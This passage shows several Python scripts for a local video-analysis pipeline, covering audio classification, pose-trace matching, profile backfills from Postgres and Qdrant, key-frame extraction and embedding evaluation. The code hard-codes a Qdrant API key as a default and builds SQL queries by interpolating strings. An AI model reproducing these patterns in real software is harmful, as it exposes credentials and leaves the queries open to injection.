face_traced_path = os.path.join(output_dir, f"{args.uuid}.face_traced.json")
pose_path = os.path.join(output_dir, f"{args.uuid}.pose.json")
output_path = os.path.join(output_dir, f"{args.uuid}.pose_traced.json")
# Check input files exist
if not os.path.exists(face_traced_path):
print(f"[PoseTrace] Error: face_traced.json not found: {face_traced_path}")
return 1
if not os.path.exists(pose_path):
print(f"[PoseTrace] Error: pose.json not found: {pose_path}")
return 1
# Run matching
assign_pose_traces(face_traced_path, pose_path, output_path, args.iou_threshold)
return 0
if __name__ == "__main__":
exit(main())
+302
View File
@@ -0,0 +1,302 @@
#!/opt/homebrew/bin/python3.11
"""
Audio Track Probe - Audio track detection and VAD classification
Used during S0 Register phase to classify audio tracks:
- no_audio: No audio track
- silent_audio: Audio track but no speech detected
- music_only: Audio with no speech (music/sound effects)
- speech_only: Audio with speech only
- speech_with_music: Audio with speech and background music
Usage:
python audio_track_probe.py --file /path/to/video.mp4
python audio_track_probe.py --file /path/to/video.mp4 --json
Output (text):
music_only
Output (JSON):
{"classification": "music_only", "speech_ratio": 0.0, "speech_segments": 0, "duration": 93.3}
"""
import argparse
import json
import subprocess
import sys
import tempfile
from pathlib import Path
try:
import torch
import numpy as np
from scipy.io import wavfile
HAS_TORCH = True
except ImportError:
HAS_TORCH = False
def get_audio_tracks(file_path: str) -> list[dict]:
"""
Get audio track information using ffprobe.
Returns:
List of audio track dicts with: index, codec, channels, language, title
"""
cmd = [
"ffprobe", "-v", "quiet",
"-print_format", "json",
"-show_streams",
"-select_streams", "a",
file_path
]
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode != 0:
return []
data = json.loads(result.stdout)
streams = data.get("streams", [])
tracks = []
for s in streams:
track = {
"index": s.get("index", 0),
"codec": s.get("codec_name", "unknown"),
"channels": s.get("channels", 2),
"language": s.get("tags", {}).get("language", ""),
"title": s.get("tags", {}).get("title", ""),
}
tracks.append(track)
return tracks
def select_best_track(tracks: list[dict]) -> int | None:
"""
Select the best audio track for VAD analysis.
Priority (原聲優先):
1. Language = original/und/unknown (assumed original)
2. Language matches common original track codes
3. Most channels
4. First track
Returns:
Stream index of best track, or None if no tracks
"""
if not tracks:
return None
# Priority 1: original/und/unknown language
for t in tracks:
lang = t.get("language", "").lower()
if lang in ("", "und", "original", "unknown"):
return t["index"]
# Priority 2: common original track languages
original_langs = ("zho", "chi", "jpn", "jap", "kor", "tha", "vie")
for t in tracks:
lang = t.get("language", "").lower()
if lang in original_langs:
return t["index"]
# Priority 3: Most channels
tracks_sorted = sorted(tracks, key=lambda x: x.get("channels", 0), reverse=True)
return tracks_sorted[0]["index"]
def extract_audio_for_vad(file_path: str, stream_index: int | None = None) -> str | None:
"""
Extract audio to temp WAV file for VAD analysis.
Returns:
Path to temp WAV file, or None if extraction failed
"""
with tempfile.NamedTemporaryFile(suffix=".wav", delete=False) as f:
output_path = f.name
cmd = ["ffmpeg", "-y", "-v", "quiet"]
if stream_index is not None:
cmd.extend(["-stream_loop", "1", "-i", file_path, "-map", f"0:{stream_index}"])
else:
cmd.extend(["-i", file_path])
cmd.extend([
"-vn", "-ac", "1", "-ar", "16000",
"-acodec", "pcm_s16le",
output_path
])
result = subprocess.run(cmd, capture_output=True)
if result.returncode != 0:
return None
return output_path
def run_vad_classification(audio_path: str) -> tuple[str, float, int]:
"""
Run Silero VAD to classify audio.
Returns:
(classification, speech_ratio, speech_segments_count)
classification: one of "music_only", "speech_only", "speech_with_music"
"""
if not HAS_TORCH:
return ("speech_only", 0.5, 0) # Default fallback
try:
# Read WAV file using scipy (avoids torchaudio dependency issues)
sample_rate, wav_data = wavfile.read(audio_path)
# Convert to float32 and normalize
if wav_data.dtype == np.int16:
wav = torch.from_numpy(wav_data.astype(np.float32) / 32768.0)
elif wav_data.dtype == np.int32:
wav = torch.from_numpy(wav_data.astype(np.float32) / 2147483648.0)
elif wav_data.dtype == np.float32:
wav = torch.from_numpy(wav_data)
else:
wav = torch.from_numpy(wav_data.astype(np.float32))
# Ensure mono
if len(wav.shape) > 1:
wav = wav[:, 0]
# Resample to 16kHz if needed
if sample_rate != 16000:
import torchaudio
resampler = torchaudio.transforms.Resample(sample_rate, 16000)
wav = resampler(wav)
sample_rate = 16000
# Load VAD model
model, utils = torch.hub.load(
repo_or_dir="snakers4/silero-vad",
model="silero_vad",
force_reload=False,
trust_repo=True,
)
model.eval()
get_speech_timestamps = utils[0]
speech_timestamps = get_speech_timestamps(
wav, model,
sampling_rate=16000,
min_speech_duration_ms=500,
min_silence_duration_ms=300,
return_seconds=True,
)
total_duration = len(wav) / 16000.0
speech_duration = sum(ts["end"] - ts["start"] for ts in speech_timestamps)
speech_ratio = speech_duration / total_duration if total_duration > 0 else 0.0
# Classification logic:
# - speech_ratio < 0.01: music_only (no speech detected)
# - speech_ratio >= 0.01 and speech_ratio < 0.3: speech_with_music (sparse speech)
# - speech_ratio >= 0.3: speech_only (mostly speech)
if speech_ratio < 0.01:
classification = "music_only"
elif speech_ratio < 0.3:
classification = "speech_with_music"
else:
classification = "speech_only"
return (classification, speech_ratio, len(speech_timestamps))
except Exception as e:
print(f"VAD error: {e}", file=sys.stderr)
return ("speech_only", 0.5, 0)
def probe_audio_track(file_path: str) -> dict:
"""
Main function: probe audio track and classify.
Returns:
dict with: classification, speech_ratio, speech_segments, duration,
track_index, track_language, all_tracks
"""
# Get audio tracks
tracks = get_audio_tracks(file_path)
if not tracks:
return {
"classification": "no_audio",
"speech_ratio": 0.0,
"speech_segments": 0,
"duration": 0.0,
"track_index": None,
"track_language": None,
"all_tracks": [],
}
# Select best track
best_index = select_best_track(tracks)
best_track = next((t for t in tracks if t["index"] == best_index), tracks[0])
# Extract audio for VAD
audio_path = extract_audio_for_vad(file_path, best_index)
if audio_path is None:
return {
"classification": "silent_audio",
"speech_ratio": 0.0,
"speech_segments": 0,
"duration": 0.0,
"track_index": best_index,
"track_language": best_track.get("language", ""),
"all_tracks": tracks,
}
# Get duration
probe_cmd = [
"ffprobe", "-v", "quiet",
"-print_format", "json",
"-show_format",
audio_path
]
probe_result = subprocess.run(probe_cmd, capture_output=True, text=True)
duration = 0.0
if probe_result.returncode == 0:
probe_data = json.loads(probe_result.stdout)
duration = float(probe_data.get("format", {}).get("duration", 0))
# Run VAD
classification, speech_ratio, speech_segments = run_vad_classification(audio_path)
# Cleanup temp file
Path(audio_path).unlink(missing_ok=True)
return {
"classification": classification,
"speech_ratio": round(speech_ratio, 4),
"speech_segments": speech_segments,
"duration": round(duration, 2),
"track_index": best_index,
"track_language": best_track.get("language", ""),
"all_tracks": tracks,
}
def main():
parser = argparse.ArgumentParser(description="Audio track probe with VAD classification")
parser.add_argument("--file", "-f", required=True, help="Video file path")
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
args = parser.parse_args()
result = probe_audio_track(args.file)
if args.json:
print(json.dumps(result, indent=2))
else:
print(result["classification"])
if __name__ == "__main__":
main()
+149
View File
@@ -0,0 +1,149 @@
#!/usr/bin/env python3
"""One-time backfill: generate .profile.json for all registered files."""
import json
import os
import sys
import subprocess
from datetime import datetime, timezone
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
DB_URL = os.environ.get("DATABASE_URL", "postgres://accusys@localhost:5432/momentry")
PSQL = "/opt/homebrew/Cellar/libpq/18.4/bin/psql"
def query_db(sql):
result = subprocess.run(
[PSQL, "-U", "accusys", "-d", "momentry", "-t", "-A", "-c", sql],
capture_output=True, text=True
)
if result.returncode != 0:
print(f"DB error: {result.stderr}", file=sys.stderr)
return []
lines = result.stdout.strip().split("\n")
return [line for line in lines if line.strip()]
def extract_key_frame(video_path, duration, output_dir, file_uuid):
"""Extract a representative frame using ffmpeg, save as JPG."""
seek_time = duration * 0.1 if duration > 0 else 1.0
out_path = os.path.join(output_dir, f"{file_uuid}.key_frame.jpg")
try:
result = subprocess.run(
[
"ffmpeg", "-y", "-ss", f"{seek_time:.2f}",
"-i", video_path,
"-vframes", "1",
"-vf", "scale=640:-1",
"-q:v", "5",
out_path
],
capture_output=True, timeout=30
)
if result.returncode == 0 and os.path.exists(out_path):
return f"{file_uuid}.key_frame.jpg"
except Exception as e:
print(f" key_frame extraction failed: {e}", file=sys.stderr)
return None
def main():
print(f"Output dir: {OUTPUT_DIR}")
print(f"Looking for files without .profile.json...")
# Get all registered files
rows = query_db(
"SELECT file_uuid, COALESCE(file_name, ''), COALESCE(file_path, ''), "
"COALESCE(file_type, 'unknown'), COALESCE(content_hash, ''), "
"COALESCE(duration, 0), COALESCE(width, 0), COALESCE(height, 0), "
"COALESCE(fps, 0), COALESCE(total_frames, 0) "
"FROM videos ORDER BY created_at"
)
created = 0
skipped = 0
for row in rows:
parts = row.split("|")
if len(parts) < 10:
continue
file_uuid, file_name, file_path, file_type, content_hash, \
duration, width, height, fps, total_frames = parts[:10]
# Compute total_frames from duration * fps if DB value is 0
db_total_frames = int(total_frames)
duration_f = float(duration)
fps_f = float(fps)
if db_total_frames <= 0 and duration_f > 0 and fps_f > 0:
computed_frames = int(duration_f * fps_f)
db_total_frames = computed_frames
query_db(
f"UPDATE videos SET total_frames = {db_total_frames} WHERE file_uuid = '{file_uuid}'"
)
profile_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.profile.json")
if os.path.exists(profile_path):
# Patch existing profiles with total_frames=0
with open(profile_path) as pf:
existing = json.load(pf)
if existing.get("metadata", {}).get("total_frames") == 0 and duration_f > 0 and fps_f > 0:
existing["metadata"]["total_frames"] = db_total_frames
with open(profile_path, "w") as pf:
json.dump(existing, pf, indent=2, ensure_ascii=False)
print(f" [patched] {file_uuid}: total_frames 0 → {db_total_frames}")
skipped += 1
continue
now = datetime.now(timezone.utc).isoformat()
parent = os.path.dirname(file_path) if file_path else ""
profile = {
"version": "1.0",
"file_uuid": file_uuid,
"file_name": file_name,
"file_type": file_type,
"birth": {
"mac_address": "",
"birthday": now,
"original_path": parent,
"original_filename": file_name,
"canonical_path": file_path,
"content_hash": content_hash if content_hash else None
},
"current": {
"path": file_path,
"file_name": file_name,
"file_type": file_type
},
"history": [{
"action": "backfilled",
"timestamp": now,
"path": file_path,
"file_name": file_name
}],
"metadata": {
"duration": duration_f,
"width": int(width),
"height": int(height),
"fps": fps_f,
"total_frames": db_total_frames
} if duration_f > 0 or int(width) > 0 else None,
"key_frame": None # will be filled below
}
# Extract key_frame for video files that exist on disk
if file_type == "video" and file_path and os.path.exists(file_path):
print(f" Extracting key_frame for {file_name}...")
kf = extract_key_frame(file_path, float(duration), OUTPUT_DIR, file_uuid)
if kf:
profile["key_frame"] = kf
with open(profile_path, "w") as f:
json.dump(profile, f, indent=2, ensure_ascii=False)
created += 1
print(f" Created: {file_uuid}.profile.json ({file_name or 'ZOMBIE'})")
print(f"\nDone: {created} created, {skipped} skipped (already exist)")
if __name__ == "__main__":
main()
+259
View File
@@ -0,0 +1,259 @@
#!/usr/bin/env python3
"""
Backfill trace profiles from Qdrant _faces collection.
For each (file_uuid, trace_id) group in Qdrant:
1. Compute frame_count, start_frame, end_frame, avg_confidence
2. Pick representative frame (highest confidence)
3. Extract key_frame.jpg from video via ffmpeg
4. Crop key_face.jpg from key_frame using representative bbox
5. Write output/{file_uuid}/trace_{N}/trace_profile.json
Usage:
python3 backfill_trace_profiles.py [--file-uuid UUID] [--dry-run]
"""
import argparse
import json
import os
import subprocess
import sys
import urllib.request
import urllib.error
from collections import defaultdict
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
QDRANT_URL = os.environ.get("QDRANT_URL", "http://localhost:6333")
QDRANT_API_KEY = os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
FACES_COLLECTION = "_faces"
BATCH_SIZE = 1000
def qdrant_scroll(filter_dict, limit=BATCH_SIZE, offset=None, with_payload=None):
"""Scroll Qdrant collection with filter."""
body = {"limit": limit, "filter": filter_dict, "with_vector": False}
if offset:
body["offset"] = offset
if with_payload:
body["with_payload"] = with_payload
url = f"{QDRANT_URL}/collections/{FACES_COLLECTION}/points/scroll"
data = json.dumps(body).encode()
req = urllib.request.Request(url, data=data, method="POST")
req.add_header("Content-Type", "application/json")
req.add_header("Api-Key", QDRANT_API_KEY)
with urllib.request.urlopen(req) as resp:
return json.loads(resp.read())
def scroll_all(filter_dict, with_payload=None):
"""Scroll all matching points."""
all_points = []
offset = None
while True:
result = qdrant_scroll(filter_dict, offset=offset, with_payload=with_payload)
points = result.get("result", {}).get("points", [])
if not points:
break
all_points.extend(points)
offset = result.get("result", {}).get("next_page_offset")
if not offset or len(points) < BATCH_SIZE:
break
return all_points
def get_video_path(file_uuid):
"""Get video file path from database."""
psql = "/opt/homebrew/Cellar/libpq/18.4/bin/psql"
result = subprocess.run(
[psql, "-U", "accusys", "-d", "momentry", "-t", "-A", "-c",
f"SELECT file_path FROM videos WHERE file_uuid = '{file_uuid}'"],
capture_output=True, text=True
)
if result.returncode == 0 and result.stdout.strip():
return result.stdout.strip()
return None
def extract_key_frame(video_path, frame_num, fps, output_path):
"""Extract a specific frame from video using ffmpeg."""
if fps <= 0:
return False
timestamp = frame_num / fps
try:
result = subprocess.run(
["ffmpeg", "-y", "-ss", f"{timestamp:.3f}",
"-i", video_path,
"-vframes", "1", "-vf", "scale=640:-1", "-q:v", "5",
output_path],
capture_output=True, timeout=30
)
return result.returncode == 0 and os.path.exists(output_path)
except Exception as e:
print(f" key_frame extraction failed: {e}", file=sys.stderr)
return False
def crop_key_face(key_frame_path, bbox, output_path):
"""Crop key_face from key_frame using bbox."""
x, y, w, h = bbox["x"], bbox["y"], bbox["width"], bbox["height"]
if w <= 0 or h <= 0:
return False
try:
result = subprocess.run(
["ffmpeg", "-y", "-i", key_frame_path,
"-vf", f"crop={w}:{h}:{x}:{y}",
"-q:v", "2", output_path],
capture_output=True, timeout=10
)
return result.returncode == 0 and os.path.exists(output_path)
except Exception as e:
print(f" key_face crop failed: {e}", file=sys.stderr)
return False
def build_trace_profiles(file_uuid=None, dry_run=False):
"""Build trace profiles from Qdrant _faces data."""
# Get all unique file_uuids with trace_id >= 0
if file_uuid:
file_uuids = [file_uuid]
else:
print("Scanning Qdrant for all file_uuids with trace_id >= 0...")
points = scroll_all(
{"must": [{"key": "trace_id", "range": {"gte": 0}}]},
with_payload={"include": ["file_uuid"]}
)
file_uuids = sorted(set(p["payload"]["file_uuid"] for p in points))
print(f"Found {len(file_uuids)} files with trace data")
total_profiles = 0
for fid in file_uuids:
print(f"\n--- {fid} ---")
# Scroll all points for this file with trace_id >= 0
points = scroll_all(
{
"must": [
{"key": "file_uuid", "match": {"value": fid}},
{"key": "trace_id", "range": {"gte": 0}},
]
},
with_payload={"include": ["frame", "trace_id", "bbox", "confidence"]}
)
if not points:
print(" No points with trace_id >= 0")
continue
# Group by trace_id
traces = defaultdict(list)
for p in points:
pl = p["payload"]
tid = pl.get("trace_id", 0)
traces[tid].append({
"frame": pl["frame"],
"bbox": pl.get("bbox", {}),
"confidence": pl.get("confidence", 0.0),
})
print(f" {len(points)} points, {len(traces)} traces")
# Get video path
video_path = get_video_path(fid)
if not video_path or not os.path.exists(video_path):
print(f" Video not found, skipping key_frame extraction")
video_path = None
# Get FPS from DB
fps = 30.0
if video_path:
psql = "/opt/homebrew/Cellar/libpq/18.4/bin/psql"
result = subprocess.run(
[psql, "-U", "accusys", "-d", "momentry", "-t", "-A", "-c",
f"SELECT COALESCE(fps, 30.0) FROM videos WHERE file_uuid = '{fid}'"],
capture_output=True, text=True
)
if result.returncode == 0 and result.stdout.strip():
try:
fps = float(result.stdout.strip())
except ValueError:
pass
for tid, faces in sorted(traces.items()):
if tid < 0:
continue
frames = [f["frame"] for f in faces]
confidences = [f["confidence"] for f in faces]
frame_count = len(faces)
start_frame = min(frames)
end_frame = max(frames)
avg_confidence = sum(confidences) / frame_count if frame_count > 0 else 0.0
# Representative frame: highest confidence
best = max(faces, key=lambda f: f["confidence"])
best_frame = best["frame"]
best_bbox = best["bbox"]
trace_dir = os.path.join(OUTPUT_DIR, fid, f"trace_{tid}")
profile_path = os.path.join(trace_dir, "trace_profile.json")
kf_path = os.path.join(trace_dir, "key_frame.jpg")
face_path = os.path.join(trace_dir, "key_face.jpg")
profile = {
"version": "1.0",
"file_uuid": fid,
"trace_id": tid,
"label": "",
"frame_count": frame_count,
"start_frame": start_frame,
"end_frame": end_frame,
"avg_confidence": round(avg_confidence, 6),
"key_frame": "key_frame.jpg" if os.path.exists(kf_path) else None,
"key_face": "key_face.jpg" if os.path.exists(face_path) else None,
"status": "pending",
}
if dry_run:
print(f" trace_{tid}: {frame_count} frames [{start_frame}-{end_frame}] "
f"conf={avg_confidence:.3f} best_frame={best_frame}")
continue
os.makedirs(trace_dir, exist_ok=True)
# Extract key_frame.jpg if not exists
if not os.path.exists(kf_path) and video_path:
extract_key_frame(video_path, best_frame, fps, kf_path)
if os.path.exists(kf_path):
profile["key_frame"] = "key_frame.jpg"
# Crop key_face.jpg from key_frame if not exists
if not os.path.exists(face_path) and os.path.exists(kf_path) and best_bbox:
crop_key_face(kf_path, best_bbox, face_path)
if os.path.exists(face_path):
profile["key_face"] = "key_face.jpg"
# Write trace_profile.json
with open(profile_path, "w") as f:
json.dump(profile, f, indent=2, ensure_ascii=False)
total_profiles += 1
if not dry_run:
print(f" Created {len([t for t in traces if t >= 0])} trace profiles")
print(f"\nDone: {total_profiles} trace profiles created")
def main():
parser = argparse.ArgumentParser(description="Backfill trace profiles from Qdrant")
parser.add_argument("--file-uuid", help="Process only this file UUID")
parser.add_argument("--dry-run", action="store_true", help="Show what would be created")
args = parser.parse_args()
build_trace_profiles(file_uuid=args.file_uuid, dry_run=args.dry_run)
if __name__ == "__main__":
main()
+148
View File
@@ -0,0 +1,148 @@
#!/opt/homebrew/bin/python3.11
"""
Compare Apple Vision pose vs MediaPipe pose
Finds:
- Intersection: Poses detected by both
- Apple Vision only: Poses only in Apple Vision
- MediaPipe only: Poses only in MediaPipe
Usage:
python3 scripts/compare_pose_detections.py --file-uuid <uuid>
"""
import argparse
import json
from pathlib import Path
def load_apple_vision_poses(file_uuid, output_dir):
"""Load Apple Vision pose data from pose.json"""
pose_path = Path(output_dir) / f"{file_uuid}.pose.json"
if not pose_path.exists():
return {}
with open(pose_path) as f:
data = json.load(f)
poses = {}
for frame in data.get('frames', []):
frame_num = frame.get('frame', frame.get('frame_number', 0))
for i, person in enumerate(frame.get('persons', [])):
pose_key = f"frame_{frame_num}_person_{i}"
poses[pose_key] = {
'frame': frame_num,
'person_idx': i,
'keypoints': person.get('keypoints', []),
'source': 'apple_vision'
}
return poses
def load_mediapipe_poses(file_uuid, output_dir):
"""Load MediaPipe pose data from pose.mediapipe.json"""
pose_path = Path(output_dir) / f"{file_uuid}.pose.mediapipe.json"
if not pose_path.exists():
return {}
with open(pose_path) as f:
data = json.load(f)
poses = {}
for frame in data.get('frames', []):
frame_num = frame.get('frame', 0)
for i, person in enumerate(frame.get('persons', [])):
pose_key = f"frame_{frame_num}_person_{i}"
poses[pose_key] = {
'frame': frame_num,
'person_idx': i,
'keypoints': person.get('keypoints', []),
'source': 'mediapipe'
}
return poses
def compare_poses(file_uuid, output_dir):
"""Compare Apple Vision vs MediaPipe poses."""
print(f"[compare] Loading pose data for {file_uuid}...")
av_poses = load_apple_vision_poses(file_uuid, output_dir)
mp_poses = load_mediapipe_poses(file_uuid, output_dir)
print(f"[compare] Apple Vision poses: {len(av_poses)}")
print(f"[compare] MediaPipe poses: {len(mp_poses)}")
# Find intersection and differences
av_keys = set(av_poses.keys())
mp_keys = set(mp_poses.keys())
intersection = av_keys & mp_keys
av_only = av_keys - mp_keys
mp_only = mp_keys - av_keys
print(f"\n[compare] === COMPARISON ===")
print(f"[compare] Intersection (both detected): {len(intersection)}")
print(f"[compare] Apple Vision only: {len(av_only)}")
print(f"[compare] MediaPipe only: {len(mp_only)}")
# Analyze intersection - check alignment
intersection_aligned = 0
for key in intersection:
av_pose = av_poses[key]
mp_pose = mp_poses[key]
# Check if both have face keypoints
av_face_kps = [kp for kp in av_pose.get('keypoints', []) if kp.get('name') in ['nose', 'left_eye', 'right_eye']]
mp_face_kps = [kp for kp in mp_pose.get('keypoints', []) if kp.get('name') in ['nose', 'left_eye', 'right_eye']]
if av_face_kps and mp_face_kps:
intersection_aligned += 1
print(f"\n[compare] Intersection with face keypoints: {intersection_aligned}")
# Frame coverage
av_frames = set(av_poses[k]['frame'] for k in av_keys)
mp_frames = set(mp_poses[k]['frame'] for k in mp_keys)
print(f"\n[compare] === FRAME COVERAGE ===")
print(f"[compare] Apple Vision frames: {len(av_frames)}")
print(f"[compare] MediaPipe frames: {len(mp_frames)}")
print(f"[compare] Overlapping frames: {len(av_frames & mp_frames)}")
# Save results
output_path = Path(output_dir) / f"{file_uuid}.pose_comparison.json"
with open(output_path, 'w') as f:
json.dump({
'apple_vision_count': len(av_poses),
'mediapipe_count': len(mp_poses),
'intersection_count': len(intersection),
'apple_vision_only_count': len(av_only),
'mediapipe_only_count': len(mp_only),
'intersection_aligned_count': intersection_aligned,
'apple_vision_frames': len(av_frames),
'mediapipe_frames': len(mp_frames),
'overlapping_frames': len(av_frames & mp_frames),
'intersection_keys': sorted(list(intersection))[:100], # Sample
'apple_vision_only_keys': sorted(list(av_only))[:100],
'mediapipe_only_keys': sorted(list(mp_only))[:100],
}, f, indent=2)
print(f"\n[compare] Results saved to: {output_path}")
def main():
parser = argparse.ArgumentParser(description="Compare pose detections")
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
args = parser.parse_args()
compare_poses(args.file_uuid, args.output_dir)
if __name__ == "__main__":
main()
+146
View File
@@ -0,0 +1,146 @@
#!/opt/homebrew/bin/python3.11
"""
Cut Key Frame Extraction - Extract representative frames from each scene for VLM analysis
For each scene in cut.json, extracts the middle frame as a key frame.
Output: {uuid}_scene_{n}.jpg files in output directory
Usage:
python cut_key_frame.py --file-uuid abc123 --video /path/to/video.mp4 --cut-json /path/to/cut.json
python cut_key_frame.py --file-uuid abc123 --video /path/to/video.mp4 --cut-json /path/to/cut.json --output-dir /custom/output
Output:
{output_dir}/{uuid}_scene_1.jpg
{output_dir}/{uuid}_scene_2.jpg
...
"""
import argparse
import json
import subprocess
import sys
from pathlib import Path
def extract_frame(video_path: str, frame_number: int, output_path: str) -> bool:
"""
Extract a single frame from video using ffmpeg.
Args:
video_path: Path to video file
frame_number: Frame number to extract (0-indexed)
output_path: Output path for the frame
Returns:
True if successful, False otherwise
"""
cmd = [
"ffmpeg", "-y", "-v", "quiet",
"-i", video_path,
"-vf", f"select=eq(n\\,{frame_number})",
"-vframes", "1",
"-q:v", "2",
output_path
]
result = subprocess.run(cmd, capture_output=True)
return result.returncode == 0
def extract_scene_key_frames(
file_uuid: str,
video_path: str,
cut_json_path: str,
output_dir: str,
) -> dict:
"""
Extract key frames from each scene in cut.json.
Args:
file_uuid: File UUID
video_path: Path to video file
cut_json_path: Path to cut.json
output_dir: Output directory for key frames
Returns:
Dict with scenes processed and output paths
"""
# Read cut.json
with open(cut_json_path, 'r') as f:
cut_data = json.load(f)
scenes = cut_data.get("scenes", [])
if not scenes:
print(f"No scenes found in {cut_json_path}", file=sys.stderr)
return {"scenes": [], "output_dir": output_dir}
fps = cut_data.get("fps", 24.0)
output_path = Path(output_dir)
output_path.mkdir(parents=True, exist_ok=True)
results = []
for scene in scenes:
scene_number = scene.get("scene_number", 0)
start_frame = scene.get("start_frame", 0)
end_frame = scene.get("end_frame", 0)
# Extract middle frame
middle_frame = (start_frame + end_frame) // 2
# Output path
output_file = output_path / f"{file_uuid}_scene_{scene_number}.jpg"
# Extract frame
success = extract_frame(video_path, middle_frame, str(output_file))
results.append({
"scene_number": scene_number,
"middle_frame": middle_frame,
"start_frame": start_frame,
"end_frame": end_frame,
"output_path": str(output_file),
"success": success,
})
if success:
print(f"[CUT_KEY_FRAME] Scene {scene_number}: frame {middle_frame} -> {output_file}")
else:
print(f"[CUT_KEY_FRAME] Scene {scene_number}: FAILED to extract frame {middle_frame}", file=sys.stderr)
return {
"file_uuid": file_uuid,
"total_scenes": len(scenes),
"scenes": results,
"output_dir": str(output_dir),
}
def main():
parser = argparse.ArgumentParser(description="Extract key frames from scenes for VLM analysis")
parser.add_argument("--file-uuid", "-u", required=True, help="File UUID")
parser.add_argument("--video", "-v", required=True, help="Video file path")
parser.add_argument("--cut-json", "-c", required=True, help="cut.json path")
parser.add_argument("--output-dir", "-o", default=None, help="Output directory (default: same as cut.json)")
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
args = parser.parse_args()
# Default output dir to same as cut.json
output_dir = args.output_dir or str(Path(args.cut_json).parent)
result = extract_scene_key_frames(
args.file_uuid,
args.video,
args.cut_json,
output_dir,
)
if args.json:
print(json.dumps(result, indent=2))
else:
print(f"Extracted {result['total_scenes']} scene key frames to {result['output_dir']}")
if __name__ == "__main__":
main()
+286
View File
@@ -0,0 +1,286 @@
#!/opt/homebrew/bin/python3.11
"""
Embedding Model Evaluation - Compare embeddinggemma vs nomic-embed-text-v2-moe
Usage:
python3 scripts/eval_embedding_models.py --file-uuid <uuid> --output-dir /path/to/output
Metrics:
1. Accuracy: Semantic similarity ranking quality
2. Speed: Latency per embedding
3. Dimension: Vector size
"""
import argparse
import json
import math
import os
import sys
import time
from pathlib import Path
try:
import requests
except ImportError:
print("requests not installed: pip install requests", file=sys.stderr)
sys.exit(1)
# Embedding endpoints
EMBED_A_URL = "http://localhost:11436/v1/embeddings" # embeddinggemma
EMBED_B_URL = "http://localhost:11434/api/embed" # nomic-embed-text-v2-moe
EMBED_B_MODEL = "nomic-embed-text-v2-moe"
# Test queries (Chinese, English, Mixed)
TEST_QUERIES = [
{"query": "穿西裝的男人", "lang": "zh"},
{"query": "室內辦公室", "lang": "zh"},
{"query": "雪景", "lang": "zh"},
{"query": "持槍的人", "lang": "zh"},
{"query": "woman in white dress", "lang": "en"},
{"query": "outdoor scene night", "lang": "en"},
{"query": "person holding object", "lang": "en"},
{"query": "穿著 formal 的男人", "lang": "mixed"},
]
def get_embedding_a(text: str) -> tuple:
"""Get embedding from embeddinggemma (port 11436)."""
start = time.time()
try:
resp = requests.post(EMBED_A_URL, json={"input": text}, timeout=30)
resp.raise_for_status()
data = resp.json()
elapsed = time.time() - start
return data["data"][0]["embedding"], elapsed
except Exception as e:
print(f"[eval] embeddinggemma error: {e}", file=sys.stderr)
return [], 0
def get_embedding_b(text: str) -> tuple:
"""Get embedding from nomic-embed-text-v2-moe (port 11434)."""
start = time.time()
try:
resp = requests.post(EMBED_B_URL, json={"model": EMBED_B_MODEL, "input": text}, timeout=30)
resp.raise_for_status()
data = resp.json()
elapsed = time.time() - start
return data["embeddings"][0], elapsed
except Exception as e:
print(f"[eval] nomic error: {e}", file=sys.stderr)
return [], 0
def cosine_similarity(a: list, b: list) -> float:
"""Calculate cosine similarity."""
if not a or not b or len(a) != len(b):
return 0.0
dot = sum(x * y for x, y in zip(a, b))
norm_a = math.sqrt(sum(x * x for x in a))
norm_b = math.sqrt(sum(y * y for y in b))
return dot / (norm_a * norm_b) if norm_a > 0 and norm_b > 0 else 0.0
def load_vlm_descriptions(file_uuid: str, output_dir: str) -> list:
"""Load VLM descriptions from trace/scene/interval profiles."""
descriptions = []
output_path = Path(output_dir)
# Load trace profiles
trace_dir = output_path / file_uuid
if trace_dir.exists():
for trace_path in sorted(trace_dir.glob("trace_*")):
profile_path = trace_path / "trace_profile.json"
if profile_path.exists():
with open(profile_path) as f:
profile = json.load(f)
desc = profile.get("vlm_description", "")
if desc:
descriptions.append({
"id": f"trace_{profile.get('trace_id', 0)}",
"type": "trace",
"text": desc,
})
# Load scene profiles
scene_profile = output_path / f"{file_uuid}_scene_profile.json"
if scene_profile.exists():
with open(scene_profile) as f:
data = json.load(f)
for scene in data.get("scenes", []):
desc = scene.get("vlm_description", "")
if desc:
descriptions.append({
"id": f"scene_{scene.get('scene_number', 0)}",
"type": "scene",
"text": desc,
})
# Load interval profiles
interval_profile = output_path / f"{file_uuid}_interval_profile.json"
if interval_profile.exists():
with open(interval_profile) as f:
data = json.load(f)
for interval in data.get("intervals", []):
desc = interval.get("vlm_description", "")
if desc:
descriptions.append({
"id": f"interval_{interval.get('interval_index', 0)}",
"type": "interval",
"text": desc,
"timestamp_sec": interval.get("timestamp_sec", 0),
})
return descriptions
def evaluate_model(get_embedding_fn, name: str, descriptions: list, queries: list) -> dict:
"""Evaluate a single model."""
print(f"\n[eval] Evaluating {name}...")
results = {
"model": name,
"dimension": None,
"avg_latency_ms": 0,
"total_embeddings": 0,
"test_results": [],
}
# Embed all VLM descriptions
vlm_embeddings = []
total_latency = 0
for i, desc in enumerate(descriptions[:100]): # Limit to 100 for speed
emb, latency = get_embedding_fn(desc["text"])
total_latency += latency
if emb:
vlm_embeddings.append({
"id": desc["id"],
"type": desc["type"],
"text": desc["text"],
"embedding": emb,
})
if results["dimension"] is None:
results["dimension"] = len(emb)
if (i + 1) % 20 == 0:
print(f"[eval] Embedded {i+1}/{min(len(descriptions), 100)}...")
results["total_embeddings"] = len(vlm_embeddings)
if vlm_embeddings:
results["avg_latency_ms"] = round(total_latency / len(vlm_embeddings) * 1000, 1)
# Test queries
for test in queries:
query_emb, latency = get_embedding_fn(test["query"])
if not query_emb:
continue
# Find top-5 similar
similarities = []
for vlm in vlm_embeddings:
sim = cosine_similarity(query_emb, vlm["embedding"])
similarities.append({
"id": vlm["id"],
"type": vlm["type"],
"text": vlm["text"][:100],
"score": round(sim, 4),
})
similarities.sort(key=lambda x: x["score"], reverse=True)
